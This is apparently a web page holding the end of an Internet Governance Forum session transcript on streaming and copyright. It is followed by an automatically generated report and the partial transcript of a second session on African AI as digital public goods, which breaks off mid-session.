I mean, the market will sort it out. We, and we are seeing already some services survive and some services just die the quick death in the case of Quibi, for instance, right? So I think that this is, we’re gonna go through a phase and where I feel that we are already into the phase of a hype where everyone wants to do streaming because it’s the new golden thing, and then some players will survive and some players will don’t, and content will play the predominant role in order to determine which ones will survive or not, as well as the engineering behind it, and whether you are able to support what you tell me, what you’re selling me, and you want me to buy.

Moderator:
Did you want to comment on just how much content’s being done? We were talking about this the other day. It’s just amazing.

Glenn Deen:
Sure, I don’t have numbers to, you know, concept to, but conceptually, we’re in a golden age of content creation. There is more content being created, both professionally and non-professionally, than ever in the history of mankind. It’s, I don’t know if this is sustainable. I’m not an economist. I’m an engineer, but wow. I mean, you’re gonna look back in years to come and say there was this explosion in the 2020s of content everywhere like we’ve never seen before. When I was a kid growing up, you know, you maybe got a new TV show here and there, and you’re kind of very excited in the fall when the new shows would come out, and now I’m in this 24-7 cycle, 365 year, where I’m always finding new content constantly. It’s amazing.

Konstantinos Komaitis:
But don’t you think that this is also because the creation of content has become much cheaper because of the internet?

Glenn Deen:
Absolutely. You know, somebody else pointed out to me the other day that there’s a new tool that came out for your phone that you can now do cinematic quality video capture and processing. I think it has an AI component on the back end that it’s literally like a cinematic quality camera. And if you think about that, you know, 10 years ago we would have been talking about the RED camera professionally, which was like, you know, a very expensive, very unique tool. And now we people have it in their hand and their phone, and it’s a downloadable app. I think it may even be free. Like, wow.

Audience:
Thanks so much, Shannon. My name is Talan Sultanov from Internet Society Kyrgyz chapter, and I wanted to follow up actually on your question on Global South and contribute to this debate on copyright. So our work was mostly related to connecting the remote communities of Kyrgyzstan to the Internet, and once we did that, we quickly realized there wasn’t much content for the local communities because everything was in Russian or in English, and people wanted content in Kyrgyz language. And we thought it would be easy. We will digitize, for example, educational materials that Ministry of Education has, books, and we couldn’t because they were all copyright protected. So we asked the Ministry of Education, can you give us the copyright? They said it belongs to the authors, so the Ministry pays to have these books, but doesn’t want to have the copyright because then the responsibility of the quality of the book goes to the Ministry, and they want to have… No, if there is a mistake, it was the mistake by the author, it’s not us, the Ministry of Education. But for us, it was a challenge. We couldn’t digitize these textbooks, and it was actually for us easier to find copyright-free Creative Commons materials from the global experience and then translate it into Kyrgyz language rather than digitizing the textbooks that were produced locally. So I think having Creative Commons materials was a really kind of lifesaver for us. Thank you. Has that market changed since you first started on that? Have you found that there’s more in the Creative Commons than when you first were trying to use copyrighted work? Now we’re finding a lot of useful materials globally. For example, we’ve adopted GSMA’s mobile internet toolkit into Kyrgyz language, Microsoft’s materials. They were all, of course, by commercial companies, but openly available. Also, we wanted to bring scientific experiments to schools, rural schools. We thought we would produce them by ourselves, but it was very expensive. So we found biology, astronomy, physics, experiments, videos, five-minute, three-minute videos online, Creative Commons, and we translated them into Kyrgyz language using voices of real local stars. So in the end, these videos were even more kind of user-friendly than the original, because the originals were voiced by scientists, and this time these were voiced by actors. And I just wanted to end, through our work for us, we developed several kind of principles that we’ve been applying now. One was local language first, so anything we do, we now do in Kyrgyz language. Then mobile first, because rural communities have very few computers, but everybody uses smartphones, and this means, for example, if we do textbooks, they can’t be just PDF, they have to be kind of, you have to be able to kind of make the font smaller, larger, and they cannot be very heavy. So for example, during COVID, Ministry of Education scanned all the books that they have, but they were so heavy, and the kids, when they download one book, all their money was gone, so they couldn’t use it. Same for video, and we found ways to make them very light, without losing the quality.

Glenn Deen:
I just want to jump in here and say, so one of my other hats is, I’m one of the ITF trustees, and one of the ITF trustees, what we actually do is, we manage the IP rights, the copyrights on all the technical standards the ITF produces. I just want to chime in and say, when you get to the ITF standards, one of the things we have pre-baked into the authorized uses, is you can translate them to any language you like. It’s already enabled, and already permission, already granted. So when you get to the ITF RFCs, you’re good to go. Thank you.

Moderator:
Thank you for the question. We have a question down here, and can you mind just identifying yourself? Sorry, I didn’t get to ask the other gentleman to do that. It’s fine. Just push the button up. There you go. It works, yes.

Audience:
Thank you very much. My name is Peter Bruch. I’m the chairman of the World Summit Awards, and we have started in 2003 with a business process to give a global, or to start a global mechanism of looking at high-quality content. And in the first year, we had 136 countries participating in 2003, and then today it’s 182 countries, and we have a United Nations system, so that from each country, so Thailand, if he’s working from Kyrgyzstan, he has one in the eight categories of the Tunis action plan, and the same as from the US, or from Australia, or from anywhere else. But I’m struck, I’m actually struck in awe by the quality of your conversation here, and I have not been privy and part of it before, and what I want to address here very much is the technologically fueled enthusiasm of Geoff Huston regarding different ways of thinking, and how the technology is actually turning, I mean, the table, I mean, upside down every three or five years. Obviously what we have is, when we look at quality of content, we have a promise, and Geoff, you related it to the library model of the internet, you know, shifting it then to the entertainment model, and you referred then also to the mobile revolution. What the business process started off is actually looking at this transformation through the internet into a knowledge society. So it was the idea of the computerization, you know, of the 60s, 70s, and 80s, I guess. What we see here is that the market is actually very successful, and many of you have really, I mean, stressed how, from copyright, you know, I think Paolo, you did your three things regarding how the last 10 years have really, I mean, shown in terms of user-generated content, in terms of open source, and so on, how this has actually really helped us shape the market in a positive way. But I would think that we have not a market failure, but a democracy failure, and the issue here is very much that the platform intermediaries, which Geoff is also talking about, and who have such a critical role, they have cannibalized the editorial intermediaries. And that is something which we have to really, I mean, start thinking about in terms of what you were talking about also, Shannon, regarding the democracy issue. So we are basically creating, you know, I mean, not just one product for one taste on a scale of billions, but we are creating also social monads, which are not relating to each other in a participatory way, but they are paralleling each other in their existence, and then they are fueled by, and I don’t want to go into all the details of the analysis here, but it is, from my question is, what is it actually in terms of the positive thinking and what the technology can deliver, and what the economics can sustain in terms of quality content regarding what I would think is something like the editorial value-add, and that would relate then to something like the Enlightenment idea of the public sphere, but I don’t want to go into that either. So thank you very much for listening to this.

Moderator:
I appreciate your comments. I’m just gonna check back in over here. Luke, did you want to add anything? You’ve been very patient through all this whole conversation. You’ve got a microphone right next to you right there.

Audience:
I just do have one question, I mean, coming from a youth perspective and about copyright. So on Instagram, there actually is a function to add a sort of audio that you do have to a reel, so when content creators, I’m just curious that, let’s say you have a song, and you record the song, but you upload it as your own audio, so what is the process then, and what happens, and how do we educate the youth to better maybe follow the best practices that are already in place, but the youth may not know about these practices? Great, I think we know who that goes to.

LANTERI Paolo:
We can do copyright clinics at the IGF. I think it would be extremely useful, and we should suggest that. Luke, you’re talking about your originally created music uploaded on Instagram? Yeah, well, I think it’s something that is, I must say, I don’t know the details of the terms of use, but it must be something very similar to what happens on YouTube whenever you upload your video. Through that process, you are basically, there is a disclaimer, you have to assert you have the rights over that piece of music you are uploading. That’s the first thing. If you have the right, you are signing up a non-exclusive licensing agreement through which basically you allow Instagram to make it available, and unless you have a specific content idea, or you are a professional author, you are an artist, you oftentimes don’t get any good economic deals out of it. So it’s a good start to make yourself known, to outreach the audience, but what we see is that professional artists normally get a specific deal in order to get some of the revenues generated through advertisement whenever your music is played. So read carefully the terms of use, and if you are planning to be a professional artist, then read even more carefully and ask someone to help you. But it’s basically, it’s a copyright licensing, and once you upload that, you can also go somewhere else and do it if it’s your song. But first step, you need to make sure it’s your creation.

Moderator:
All right, we are at time. Thank you all for being part of this very good discussion. It looks like we survived the last 10 years. I’m hoping that we can do this again in another 10 and see where we have come in. So I just want to appreciate everyone’s time this morning. Thank you, Jeff, for coming in remotely, and thank you for all of you who are participating here in the audience and those that helped us coordinate all this. So have a good day at the IGF. Thank you.

Audience

Speech speed

157 words per minute

Speech length

1372 words

Speech time

526 secs

Geoff Huston

Speech speed

163 words per minute

Speech length

2485 words

Speech time

915 secs

Glenn Deen

Speech speed

205 words per minute

Speech length

2090 words

Speech time

612 secs

Konstantinos Komaitis

Speech speed

180 words per minute

Speech length

1583 words

Speech time

528 secs

LANTERI Paolo

Speech speed

149 words per minute

Speech length

3477 words

Speech time

1404 secs

Moderator

Speech speed

214 words per minute

Speech length

2159 words

Speech time

607 secs

Online Moderator

Speech speed

172 words per minute

Speech length

1168 words

Speech time

406 secs

Stella Anne Ming Hui Teoh

Speech speed

195 words per minute

Speech length

551 words

Speech time

169 secs

African AI: Digital Public Goods for Inclusive Development | IGF 2023 WS #317

Table of contents

Disclaimer: It should be noted that the reporting, analysis and chatbot answers are generated automatically by DiploGPT from the official UN transcripts and, in case of just-in-time reporting, the audiovisual recordings on UN Web TV. The accuracy and completeness of the resources and results can therefore not be guaranteed.

Full session report

Audience

The analysis covers several important topics related to the development of AI and its impact on various aspects of society. One of the key points discussed is the significance of data infrastructure and access to compute for the democratization of AI. It is noted that the lack of proper data infrastructure can hinder the development and use of AI, especially in contexts like Africa or the global South.

Another point raised is the need to address challenges regarding data infrastructure and compute access. While no specific supporting facts are provided, this suggests that there are issues that need to be discussed and resolved to ensure that AI can be effectively utilized and its benefits can be accessible to all.

The analysis also touches upon the presence of AI policies and legislation in Kenya. The question raised is whether Kenya has a specific AI policy in place and corresponding legislation to operationalise it. Unfortunately, no supporting facts or evidence are presented to explore this question further.

Lastly, the analysis considers the topic of human-robot interaction, specifically focusing on how human workers should perceive and interact with robots. However, no supporting facts or arguments are provided to delve deeper into this topic.

In conclusion, the analysis raises important questions and topics related to data infrastructure, access to compute, AI policies and legislation, and human-robot interaction. However, it is worth highlighting that the lack of supporting facts or evidence limits the depth of analysis and leaves several open-ended questions.

Yilmaz Akkoyun

AI has the potential to significantly impact inclusive development and help achieve the Sustainable Development Goals (SDGs). It can play a crucial role in improving access to medical services and increasing efficiency in agriculture, which can contribute to the goals of good health and well-being (SDG 3) and zero hunger (SDG 2). AI applications can facilitate medical service delivery by assisting in diagnostics, monitoring patients’ health, and providing personalized treatment. In agriculture, AI can enhance productivity, optimize resource usage, and improve food security.

However, there are challenges associated with the access and negative effects of AI that disproportionately affect developing countries (SDG 10). Only a fraction of the global population currently has access to AI applications tailored to their specific needs. This digital divide reinforces existing inequalities and limits the potential benefits of AI for those who need it the most. Moreover, negative impacts of AI, such as job displacements and bias in decision-making algorithms, can exacerbate existing inequalities in developing countries.

Ethical considerations and the regulation of AI are also critical. Risks associated with AI range from high greenhouse gas emissions to digital disinformation and risks to civil and democratic rights (SDG 16). To ensure the responsible and fair development and use of AI, it is essential to promote ethical principles and practices. This includes addressing issues such as algorithmic bias, ensuring transparency and accountability, and safeguarding privacy and human rights.

In order to reduce inequalities and ensure diverse representation, it is important to have AI expertise and perspectives from various regions, including African countries (SDG 10). Africa has seen the emergence of various AI initiatives, and it is crucial to involve these initiatives in shaping the global conversation around AI. This will help ensure more equitable development and minimize the risk of marginalization.

The German Federal Ministry for Economic Cooperation and Development (BMZ) is committed to supporting the realization of AI’s potential through local innovation in partner countries (SDGs 8 and 9). The BMZ believes that digital public goods, such as open AI training datasets and research, are important enablers of economic and political participation. These measures can enhance economic growth and create opportunities for communities to harness AI for their specific needs.

Access to open AI training data and research, as well as open-source AI models, is considered foundational for local innovation (SDG 9). By sharing relevant data, AI models, and methods openly as digital public goods, a global exchange of AI innovations can be fostered, benefiting various regions and promoting cross-cultural collaboration.

In conclusion, AI holds tremendous potential for inclusive development and the achievement of SDGs. However, challenges of access, negative effects, and ethical concerns must be addressed. It is essential to ensure diverse representation, particularly from regions such as Africa, and promote ethical AI practices. Open access to AI training data and research is crucial for fostering local innovation and accelerating progress towards the SDGs. The African AI initiatives are inspiring and underscore the need for continued dialogue and learning about AI’s impact on development.

Zulfa Bobina

AI technologies, though viewed as an ideal as digital public goods, have not yet become a reality. They are described as more of a future aspiration rather than something that is currently achievable. However, there is optimism about the future growth of AI technologies and collaborations. More work is being done in the advocacy space, which is believed to lead to a more widespread adoption of AI technologies.

Civil society is seen as playing a vital role in addressing ethical considerations related to AI. It is believed that civil society can step in to address these concerns and ensure that AI technologies are developed and deployed ethically and responsibly. Efforts are being made to address these ethical concerns through research and advocacy.

There is a need for comprehensible communication regarding AI technologies. It is argued that explaining technologically complex concepts in simple language can help the general population understand and incorporate these technologies into their lives. The goal is to avoid elitism in technology comprehension and ensure that everyone has access to and understands AI technologies.

The often overlooked human workforce behind automated technologies is being highlighted and advocated for. It is recognized that automation and AI technologies can have a significant impact on the workforce. Therefore, efforts are being made to support and advocate for the rights of these workers to ensure fair treatment and protection in the face of technological advancements.

Harmonizing collective and individual rights is emphasized, particularly when it comes to data rights. It is argued that adopting western blueprints of data rights that focus solely on individual rights may not be suitable for African societies. There is a need for more balanced regulations that take into account both collective and individual rights.

Discussions around AI technologies as a public good are considered important. There are considerable discussions taking place, especially at events like the Kyoto summit. Furthermore, public interest in data and AI technologies is growing, highlighting the need for ongoing discussions and dialogue as technologies progress.

Overall, there is excitement about the various activities happening across the continent in the field of AI and technological developments. These advancements are seen as opportunities for growth and progress. While there are challenges and ethical considerations to address, there is an optimistic outlook for the future of AI technologies in Africa.

Darlington Akogo

Mino Health AI Labs, a leading healthcare technology company, has developed an advanced AI system that can interpret medical images and deliver results within seconds. This groundbreaking technology has received approval from FDA in Ghana and has attracted users from approximately 50 countries across the globe. By providing fast and accurate results in medical image interpretation, the AI system has the potential to significantly accelerate and streamline healthcare processes.

Although the benefits of AI applications in healthcare are evident, it is crucial to subject these systems to rigorous evaluation processes, especially in healthcare. Approval of AI systems by health regulators can be challenging and requires extensive testing to ensure their effectiveness, reliability, and safety. It is essential to distinguish between AI research or prototypes and their real-world implementations, as the latter demands meticulous scrutiny and validation.

Considering the perspective of users is another important aspect of AI implementation. Users should actively participate in determining the features and operations of AI systems, particularly in healthcare. This ensures that these systems seamlessly integrate into users’ workflow and effectively meet their specific needs. Their input provides valuable insights on optimizing the functionality and usability of AI solutions, ultimately enhancing their impact in healthcare.

Moreover, the concept of businesses being built around solving problems connected to the Sustainable Development Goals (SDGs) has gained prominence. Companies such as Mino Health align their business strategies with addressing issues related to healthcare access and food security, demonstrating a positive approach towards achieving the SDGs. By focusing on solving socially significant problems, businesses can contribute to broader societal goals and make a tangible difference in people’s lives.

To guide businesses in achieving a balance between profit and impact, the concept of an internal constitution has emerged. This moral code acts as a set of guidelines for the company’s operations and ensures that its decisions and actions align with its core values. In certain cases, even the CEO can be voted out if they deviate from the principles outlined in the internal constitution. This mechanism promotes a sense of ethical responsibility within the business and encourages a long-term view that prioritizes societal welfare alongside financial success.

Furthermore, businesses can be registered for public good, which implies an obligation to prioritize the public interest over the interests of shareholders and investors. This designation reinforces the idea that businesses should focus on the common good, aiming to create positive social impact rather than solely maximizing profits. By doing so, businesses can align their objectives with the well-being of communities and contribute to the achievement of the SDGs.

Artificial intelligence (AI) has tremendous potential in aiding the attainment of the SDGs. The ability of AI to process vast amounts of data and derive actionable insights can be instrumental in addressing complex societal challenges. Investing in AI can be a strategic approach to tackling the problems identified within the SDGs, as it enables the development of innovative solutions and the efficient allocation of resources.

However, while harnessing the power of AI is essential, it is equally important to exercise responsibility and adhere to ethical frameworks. The transformative nature of AI technology calls for careful consideration of its potential risks and impacts. Leveraging AI in a responsible manner involves issues such as bias, accountability, and privacy, among others. Operating within ethical boundaries is crucial to prevent the emergence of new problems that could arise from unchecked deployment of AI systems.

In summary, Mino Health AI Labs has made significant advancements in the field of healthcare through the development of their AI system for medical image interpretation. However, the successful implementation of AI in healthcare requires rigorous evaluation, active user involvement, and a focus on aligning business strategies with the SDGs. The concept of an internal constitution and the registration of businesses for public good provide mechanisms to guide companies towards balancing profit and societal impact. AI, if invested in responsibly, holds the potential to address the challenges addressed within the SDGs. At this pivotal juncture in history, there is a need to harness AI technology while ensuring its ethical and responsible use to avoid unforeseen consequences.

Meena Lysko

During the discussion on industry, innovation, infrastructure, and data privacy in South Africa, several important topics were addressed. One of the key points highlighted was the implementation of the Protection of Personal Information Act (POPI Act) and the Cyber Crimes Act. These acts were considered crucial for prioritising the safeguarding of personal information and for providing a legal framework to address various digital offences.

It was acknowledged that challenges arise in striking the balance between innovation and compliance in digital privacy. However, the speakers emphasised that the POPI Act and the Cyber Crimes Act play a vital role in ensuring responsible handling of data by organisations in South Africa.

Collaboration between businesses, individuals, and law enforcement agencies was emphasised as imperative in moving forward with the implementation of these acts. This collaboration is seen as a key factor in promoting the responsible use of personal information and in effectively addressing digital offences. The need for joint efforts in creating a secure and ethical digital environment was highlighted.

Another significant point discussed was the incorporation of ethics in the AI systems lifecycle. It was emphasised that ethics should be included from conception to production of AI systems. This includes the integration of a module on AI ethics and bias in training programmes. Ethical competence, which includes knowledge of laws and policies, was deemed necessary for individuals involved in AI development. Additionally, the need for an ethically tuned organisational environment was highlighted to ensure the responsible and ethical use of AI systems.

The importance of industry interaction in AI and data science training was also emphasised. The inclusion of industry experts in training sessions was seen as a means of facilitating knowledge sharing and promoting morally sound solutions. This collaboration between the training programmes and industry experts was found to be beneficial in keeping up with the latest trends and developments in the field.

The positive impact of training programmes on participants was highlighted with the assertion that these programmes support quality education, industry innovation, infrastructure development, zero hunger initiatives, and responsible consumption. The post-training feedback from previous programmes indicated that the training positively influenced the participants.

Lastly, the use of open AI systems was advocated as a means of contributing to sustainable digital development. It was noted that proprietary AI systems are generally used to make money, ensure security, empower technology, and simplify tasks. However, open AI systems were proposed as a more sustainable alternative for digital development.

In conclusion, the discussion highlighted the significance of the POPI Act and the Cyber Crimes Act in South Africa for ensuring personal data protection and addressing digital offences. Collaboration between businesses, individuals, and law enforcement agencies was deemed essential in moving forward with these acts. Ethics in AI systems development and the incorporation of industry interaction in training programmes were emphasised. The positive impact of training programmes on participants and the advocacy for the use of open AI systems in sustainable digital development were also discussed as important aspects of the conversation.

Susan Waweru

The Kenyan government has demonstrated a strong commitment to implementing and adhering to policies related to artificial intelligence (AI) and digital transformation. The Constitution of Kenya plays a significant role in guiding the development and use of AI. It includes provisions that emphasise transparency, accountability, and the protection of privacy rights. This indicates that the government recognises the fundamental importance of privacy in AI systems.

Moving beyond theoretical frameworks to actual implementation is a crucial step in the development of AI. The government understands the significance of leadership commitment in successfully executing plans. Without strong leadership support and commitment, the implementation and execution of policies become challenging.

The Kenyan government is actively pursuing digitisation and aims to develop an intelligent government. Key efforts in this direction include onboarding all government services onto eCitizen, a platform that provides online access to government services. The President himself is overseeing the Digital Transformation Agenda, highlighting the government’s high level of interest in digitisation. Currently, the government’s focus is on infrastructure development to support these digital initiatives.

Privacy and accessibility are two important principles emphasised in the development of digital public goods and AI technology. The government recognises that video surveillance mechanisms should respect privacy and not infringe on people’s freedoms. The Data Protection Act in Kenya primarily affects data controllers and processors, ensuring that personal data is handled with care and protects individual privacy.

To further support AI development, the Kenyan government is working towards separate legislation and strategies specifically for AI. This demonstrates a commitment to creating a comprehensive and focused approach to AI policy. The government is actively drafting AI legislation and has established a central working group to review and update tech-related legislations, policies, and strategies.

In line with their commitment to effective governance, the Kenyan government is developing an AI chatbot. This chatbot, using natural language processing with large datasets, is aimed at enhancing compliance and bringing government services closer to the people. It will be available 24/7, providing services in both English and Swahili.

Demystifying AI and promoting human-centred design are also important aspects. The government recognises that creating awareness and understanding among the public can enhance the adoption and reduce fear of AI. In addition, a focus on human-centred design ensures that AI development prioritises the needs of citizens over the benefits of organisations.

Finally, the benefits of AI, especially in public service delivery, are highlighted. The government acknowledges that AI has the potential to provide significant benefits to its citizens. The aim is to ensure that the advantages of AI technology outweigh any potential risks.

In conclusion, the Kenyan government has taken substantial steps towards implementing and adhering to AI and digital transformation policies. With a strong commitment to privacy, accessibility, and human-centred design, as well as efforts to develop separate AI legislation and strategies, the government is actively working to create a more inclusive and technologically advanced society. Through initiatives such as the AI chatbot and the digitisation agenda, the government aims to provide efficient and accessible services to its citizens.

Moderator – Mark Irura

During the discussion, several important topics related to healthcare and the implementation of digital solutions were discussed. Mark Irura emphasised the need for risk assessment and harm prevention when incorporating digital solutions. He highlighted the importance of evaluating potential risks and taking necessary precautions to protect individuals from physical, emotional, and psychological harm. Irura also stressed the importance of implementing data protection protocols to safeguard sensitive information and maintain citizens’ privacy.

The discussion also acknowledged the challenge of balancing business interests with Sustainable Development Goals (SDGs) and the integration of artificial intelligence (AI). It was recognised that business requirements and regulations may take precedence at times, making it difficult to align them with the objectives of sustainable development and the use of AI technologies. The speakers agreed that finding a harmonious balance between these different aspects is crucial to ensure the successful implementation of digital solutions that contribute positively to both business interests and the achievement of SDGs.

Mark Irura further emphasised the need for developing strategies that can effectively align business objectives, SDGs, and AI technologies. He inquired about the approach used to align these elements in addressing various challenges. This highlights the importance of creating a comprehensive framework and implementing strategies that consider all three components, providing a cohesive and integrated approach to problem-solving.

Overall, the speakers strongly emphasised the need for rigorous certification processes, active user involvement in decision-making processes, and robust data protection measures. These measures are crucial to mitigate risks and ensure the well-being of individuals when implementing digital solutions. The discussion conveyed the wider implications of the implementation process and the importance of responsible use of AI technologies in healthcare and other sectors.

Session transcript

Moderator – Mark Irura:
I want to check also if the colleagues online have been able to join. Bobina, Dr. Mina Zulfa and Darlington, are you online with us?

Meena Lysko:
This is Mina. Yes, I am online. Thank you.

Moderator – Mark Irura:
Bobina? Perfect.

Zulfa Bobina:
Hello. I’m here as well.

Moderator – Mark Irura:
All right, thank you. So we are missing Darlington, but we’ll start with the session. I will start with introductions. My name is Mark Irura. And today we are here to talk about AI and its use, particularly for sustainable development as far as digital public goods are concerned. It’s some work that we have been doing in Africa, and we kind of will do a little bit of a deep dive looking at some of the things that we have done as a program within GIZ, but also explore what are some of the risks that are coming out in the discussions that we have. With us today, we have Yilmaz from the Federal Ministry of Economic Cooperation and Development, BMZ. We have Susan O’Hara seated beside me. She’s the head of legal at the Office of the Data Protection Commissioner. I have Dr. Mina Lisko. She brings on board her experience having worked with government, academia, and the private sector. And she’s currently a director at Move Beyond Consulting based in South Africa. And we have Bobina Zulfa. Bobina is an AI and data rights researcher at Policy based in Uganda. Policy is a feminist collective of technologists, data scientists, creatives, and academics working at the intersection of data, design, and technology to see how government can improve on service delivery. We’ll start with a keynote from Yilmaz to talk to us a little bit about, from a high overview, what they are doing before we delve into the conversation. So over to you. Thank you.

Yilmaz Akkoyun:
Dear Mark, distinguished guests and colleagues, dear ladies and gentlemen, dear IGF friends, it’s a great honor on behalf of the German BMZ and pleasure to share a few opening remarks today highlighting the potentials of AI, especially African AI, for inclusive development. What is the potential of AI for inclusive development? I think we already heard a lot on day zero and today. In my view, it can be instrumental in achieving the SDGs. They can facilitate medical service delivery, increase efficiency in agriculture, and improve food security, challenges of our time. Yet, only a fraction of the population worldwide has access to AI applications that are tailored to their needs. And we want to change this. This is why we are here. And on top of that, the negative effects of AI disproportionately affect developing countries, especially in the global south. However, we also need to be aware of the risks related to AI. These risks range from high greenhouse gas emissions of large language models to digital disinformation and risks to civil and democratic rights. The international community is becoming increasingly aware of these issues, and we see it here at the IGF. Accordingly, in my view, the promotion of ethical, fair, and trustworthy AI, as well as the regulation of its risks, are beginning to be addressed at the global level, as we heard this morning in the G7 context of the AI Hiroshima process. AI has been addressed in the UN, G7, G20, and international organizations such as UNESCO and the OECD have published principles and clear recommendations that aim to protect human rights with AI being on the rise worldwide. And the EU is on the forefront of regulating AI with the EU AI Act. Secretary General Guterres is convening a multi-stakeholder high-level advisory board for AI that will include emerging and developing countries. I think these conversations between countries from the global north and the global south are essential so we can make sure that AI benefits all. And when talking about AI, we mostly hear about models and applications developed in Silicon Valley, California of the US, or in Europe, but there’s so much more. And we discuss large language models that represent and benefit only a fraction of the world population. That is why I’m especially excited to hear about AI use cases today that were developed and deployed in African countries and that truly represent African AI, and that were designed specifically to benefit the public in African countries. As the German Federal Ministry of Economic Cooperation and Development, we want to enhance economic, political participation of all people in our partner countries. And we are very eager to support our global partners to realize the potential of AI through local innovation in these countries that we are talking about here in this session. We are very committed to the idea that digital public goods are an important enabler. For example, to be more concrete, the access to open African language datasets is supporting local governments and the private sector in building AI-empowered services for citizens. For instance, our initiative Fair Forward contributes to the development of open AI training datasets in different languages, Kiswahili, Kinyarwanda, and Luganda, languages spoken by more than 150 million people collectively. And some of the examples we’ll get to know in this session are built on these language datasets. I’m looking very much forward to this. And to give you an outlook, we see open access to AI training data and research, as well as open source AI models as the foundation for local innovation. Therefore, relevant data, AI models, and methods should be shared openly as digital public goods. To realize the potential of AI for inclusive and sustainable development, we need to make sure at the same time that AI systems are treated as digital public goods. Open, transparent, and inclusive at the same time. In this way, a global exchange on AI innovations can emerge. This IGF with AI being mentioned in so many sessions is one starting point for the global exchange. And now, I’m looking very much forward to the use cases. And thank you so much for being part of this wonderful session.

Moderator – Mark Irura:
Thank you so much. So, before we dive in and building upon that, we are kind of taking a critical approach to try and see how are we beginning to define what AI means to us in the continent, in the African continent. And today, we specifically have this idea that we can actually build solutions and systems and not just look at it from a policy and a framework perspective, so to speak. And I will start with Susan, because she’s in the room and in the hot seat. And I will ask, I will start you to the framework, right? And what the Office of the Data Protection Commissioner is doing in Kenya as far as thinking about AI. And then, also explore if you have any ideas and context about what is happening in the rest of the continent.

Susan Waweru:
Thank you, Mark, for your question. And good evening to all. As you’ve heard, my name is Susan Awero from the Office of the Data Protection Commissioner in Kenya. As we may be aware, in the AI context, privacy is of fundamental importance to ensure that AI works for the benefit of the people and not to their harm. Discussing on the frameworks, in Kenya, the top echelon of frameworks is the Constitution of Kenya. Within that constitution, we have several provisions that sort of guide AI in Kenya now. One of them is the values and principles of governance. From a government perspective, we are bound to be transparent, to be accountable, to be ethical in everything that we do. This includes in the deployment of AI for public service, in the service delivery in all forms. Secondly, we have values and principles of public service. These are the values and principles that govern us as public servants in how we carry out our public duties. So, that is what, at a constitutional level, will be guided by in the deployment of AI in delivery of service. Of most importance is the Bill of Rights and Fundamental Freedoms. Within that Bill of Rights and Fundamental Freedoms, which is also in our constitution, we have the right to privacy. The right to privacy is what bats data protection laws, data protection policies, and data protection frameworks in Kenya. So, having the top organ, the top-groomed norm in Kenya, giving the guardrails in which AI, privacy, data protection will be guided by, gives a good background and a firm fundamental foundation for any other strategy or policy in tech or in AI can then spring from. It forms the global guardrail for everything that should be done. So, it may not specifically touch on AI, but these values and principles, the Bill of Rights and Fundamental Freedoms, give you the constitutional guardrail of what you can and cannot do in the AI space. So, it is from that mark, then, the frameworks. All other frameworks, including the AI strategy, the digital master plan, all must adhere to.

Moderator – Mark Irura:
Thanks. Thanks, Susan. And building upon that and the increasing knowledge that we have these things anchored in constitution or in principles that you want to develop, and then we have digital public goods. And digital public goods, then, are ways in which government is offering shared services. So, if you have a registry, for example, a civil birth and death registry, how can it be leveraged across government, rather than the social security and the hospital insurance fund and the tax administration all have their own registers, but kind of duplicating that effort. And so, from that knowledge, we are also beginning to think about how, because we have an opportunity and we have seen how multiple registers affect how government delivers services. Then we see the need for adopting this in government, because it can be cheaper. It can be cheaper in terms of how government procures these services. And I’m giving this background, because I do not know if Darlington is online. Is Darlington there? All right. So, you can introduce yourself and then move on to the question and share with us what you’re doing in West Africa. And then you can also talk a little bit about the lessons you’re learning from the work that you’re doing. And are you using any digital public goods approaches in your work? So, over to you, Darlington. Thank you.

Darlington Akogo:
Thank you for having me. My name is Darlington Akogo, founder and CEO of Mino Health AI Labs and Karangroo AI. So, I’m in a moving vehicle. So, apologies for any sounds. But, yeah. So, what we do at Mino Health AI Labs is build artificial intelligence solutions for healthcare. And so, connected to the question, we do have one AI system that is focused on medical image interpretation. And, you know, we got the health regulators in Ghana, FDA Ghana, to certify and approve this AI system. And, yeah. So, we rolled it out. We have users from all over. We’ve had sign-ups from about 50 countries around the world. In Ghana, we have it being used in, you know, some of the top, I mean, the capital cities, but also some small towns. And, we are expanding access to even really rural areas. The benefits of, you know, this AI system to the communities, for example, is that by default, if you go take a medical image and x-ray, for example, it will take several weeks before you get the results. Because, you know, there are very few radiologists. So, in Ghana, for example, there are about 40 radiologists. If you take an African country like Liberia, they only have less than five radiologists. So, what this AI system does is, you know, help speed up that process by using AI to interpret that medical image. So, the AI system, if you โ€“ we have it online at platform.vinohealth.ai. And, this AI system is able to generate results in just a few seconds. About five, ten seconds, you get the results. So, what used to take weeks can now just take a few seconds. It makes all the difference in healthcare. Because, you want to know exactly what is wrong with people quick enough that you can respond to it. The lessons we’ve learned are quite a lot. One key one is within the space of AI, there’s a huge difference between, you know, doing AI for research or, you know, doing some sort of demo proof of concept. And, building real world AI that is meant to work with real humans. There’s a whole lot of difference. The key thing is the rigorous evaluations you need to do. And, this is super applicable in healthcare. So, getting the AI system to be certified by FDA or health regulator is a very, very major step. And, what it takes to get health regulators to certify, you know, an AI system for some use cases quite a lot. But then, you learn a lot of lessons. So, one of the key things we learned is just double down on rigorous evaluation. The other bit is, you don’t want to build the AI system and just hand it over to, you know, the users. Let them decide what kind of features they want, how they want the AI system to fit into their workflow. That is very important.

Moderator – Mark Irura:
Thank you so much, Darlington. Thank you. And, moving from what you’ve just said, like, I will turn to you, Mina, and ask about, Darlington just said, like, it’s very different when you’re doing a research project, but when you’re actually implementing a solution. Like, there are a lot of things. There are a lot of risks. And, from the wide goal, I think one of the approaches from, you know, a digital public goods perspective, or a DPI perspective, a digital public infrastructure perspective, is can we cause harm? What are the risks? How can we expose data we shouldn’t expose, and how do we protect code bases we shouldn’t, so that there are no harms that ultimately translate to the citizens? So, I will invite you to reflect on that. Thank you.

Meena Lysko:
